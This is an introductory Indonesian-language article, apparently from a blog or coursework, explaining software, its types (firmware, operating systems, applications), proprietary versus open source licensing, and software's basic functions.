      Agar komputer dapat membaca, mengingat, membuat keputusan (membandingkan), menghitung, menyortir, dan menghasilkan keluaran berupa informasi dalam monitor atau cetakan, komputer harus dapat membaca dan memasukkan program ke dalam memori utamanya. Program adalah instruksi dalam bahasa mesin atau yang dapat dibaca oleh komputer yang dirancang untuk tujuan tertentu sehingga kalau operator menjalankan komputer dan memijat tombol tertentu (misalnya untuk memroses data akuntansi) disebut dengan program aplikasi (aplication program). Pengertian perangkat lunak menunjuk pada program dan alat bantu lain yang bersifat menambah kemampuan komputer sebagai alat untuk melaksanakan tugas atau operasi tertentu. Program aplikasi dapat dibuat secara khusus untuk memenuhi kebutuhan khusus pula (tailor-made) atau berupa paket yang mempunyai aplikasi umum.


        Disebut juga dengan perangkat lunak, merupakan kumpulan beberapa perintah yang dieksekusi oleh mesin komputer dalam menjalankan pekerjaannya. perangkat lunak ini merupakan catatan bagi mesin komputer untuk menyimpan perintah, maupun dokumen serta arsip lainnya. Merupakan data elektronik yang disimpan sedemikian rupa oleh komputer itu sendiri, data yang disimpan ini dapat berupa program atau instruksi yang akan dijalankan oleh perintah, maupun catatan-catatan yang diperlukan oleh komputer untuk menjalankan perintah yang dijalankannya. Untuk mencapai keinginannya tersebut dirancanglah suatu susunan logika, logika yang disusun ini diolah melalui perangkat lunak, yang disebut juga dengan program beserta data-data yang diolahnya. Pengeloahan pada software ini melibatkan beberapa hal, diantaranya adalah sistem operasi, program, dan data. Software ini mengatur sedemikian rupa sehingga logika yang ada dapat dimengerti oleh mesin komputer.


Jenis

Berdasarkan jenisnya, software dibagi menjadi 3 yaitu :
  • Firmware (BIOS)
  • Sistem Operasi (Windows, Linux, Mac OS, dll)
  • Software Aplikasi (Photoshop, WinAmp, WinZip, dll)


Propietary Software

     Propietary software adalah perangkat lunak yang tidak bebas atau semi bebas dan tidak terbuka. Pengguna dilarang atau minta ijin atau dikenakan pembatasan lainnya jika menggunakan, mengedarkan atau memodifikasinya. Source code normalnya tidak tersedia. Contoh dari propietary software adalah sistem operasi windows. Jenis software ini yang paling banyak dikenai razia oleh pihak yang berwajib.


Open Source Software

       Pola Open Source lahir karena kebebasan berkarya, tanpa intervensi berpikir dan mengungkapkan apa yang diinginkan dengan menggunakan pengetahuan dan produk yang cocok. Kebebasan menjadi pertimbangan utama ketika dilepas ke publik. Komunitas yang lain mendapat kebebasan untuk belajar, mengutak-ngatik, merevisi ulang, membenarkan ataupun bahkan menyalahkan, tetapi kebebasan ini juga datang bersama dengan tanggung jawab, bukan bebas tanpa tanggung jawab.

     Open source software seringkali rancu dengan free software, padahal ada sejumlah hal yang harus dipenuhi bila dianggap sebagai open source software, yaitu bebas didistribusikan tanpa adanya persyaratan royalty, program harus memiliki source code, lisensi harus bisa dimodifikasi dan diturunkan, integrity dari pembuat source code, lisensi tidak mendiskriminasi seseorang atau sekelompok orang, tidak ada diskriminasi melawan area pengembangan, hak cipta pada suatu program harus mampu diaplikasi dan didistribusi kembali oleh siapapun, lisensi tidak mengacu pada spesifikasi suatu produk, lisensi tidak membatasi tempat dimanasoftware tersebut didistribusikan, dan lisensi harus berisi teknologi yang netral.


Fungsi

Beberapa fungsi software antara lain :
  • mengatur Input atau Output (I/O) dari PC
  • menyediakan dan mengatur serta memerintahkan hardware agar dapat berjalan dengan baik
  • menjalankan perintah-perintah tertentu seperti menggambar, memutar musik atau film.



   Jadi scara garis besar Software adalah kumpulan instruksi yang berfungsi untuk menjalankan suatu perintah, seperti memberikan informasi tentang hardware, menentukan fungsi hardware, dan menjalankan sistem.



Daftar Pustaka